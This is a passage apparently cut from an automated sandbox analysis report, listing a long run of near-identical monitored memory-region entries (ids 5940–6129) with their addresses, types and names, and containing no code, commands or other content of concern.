= "pagefile_0x0000000000530000" filename = "" Region: id = 5940 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5941 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5942 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5943 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5944 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5945 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5946 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5947 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5948 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5949 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5950 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5951 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5952 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5953 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5954 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5955 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5956 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5957 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5958 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5959 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5960 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 5961 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 5962 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5963 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5964 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5965 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5966 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5967 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5968 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5969 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5970 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5971 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5972 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5973 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5974 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5975 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5976 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5977 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5978 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5979 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5980 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5981 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5982 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5983 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5984 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5985 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5986 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5987 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5988 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5989 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5990 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5991 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5992 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5993 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5994 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5995 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5996 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5997 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5998 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5999 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6000 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6001 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6002 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6003 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6004 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6005 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6006 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6007 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6008 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6009 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6010 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6011 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6012 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6013 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6014 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6015 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6016 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6017 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6018 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6019 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6020 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6021 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6022 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6023 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6024 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6025 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6026 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6027 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6028 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6029 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6030 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6031 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 6032 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 6033 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6034 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6035 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 6036 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 6037 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6038 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6039 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6040 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 6041 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 6042 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6043 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6044 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6045 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6046 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6047 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6048 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6049 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6050 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6051 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6052 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6053 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6054 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6055 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6056 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6057 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6058 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6059 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6060 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6061 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6062 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6063 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6064 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6065 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6066 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6067 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6068 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6069 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6070 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6071 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6072 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6073 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6074 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6075 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6076 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6077 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6078 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6079 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6080 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6081 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6082 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6083 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6084 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6085 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6086 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6087 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6088 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6089 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6090 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6091 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6092 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6093 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6094 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6095 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6096 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6097 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6098 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6099 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6100 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6101 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6102 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6103 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6104 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6105 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6106 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6107 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6108 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6109 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6110 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6111 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6112 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6113 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6114 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6115 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6116 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6117 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6118 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6119 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6120 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 6121 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 6122 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6123 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6124 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6125 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6126 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6127 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6128 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6129 start_va = 0x2370000 end_va = 0x237efff 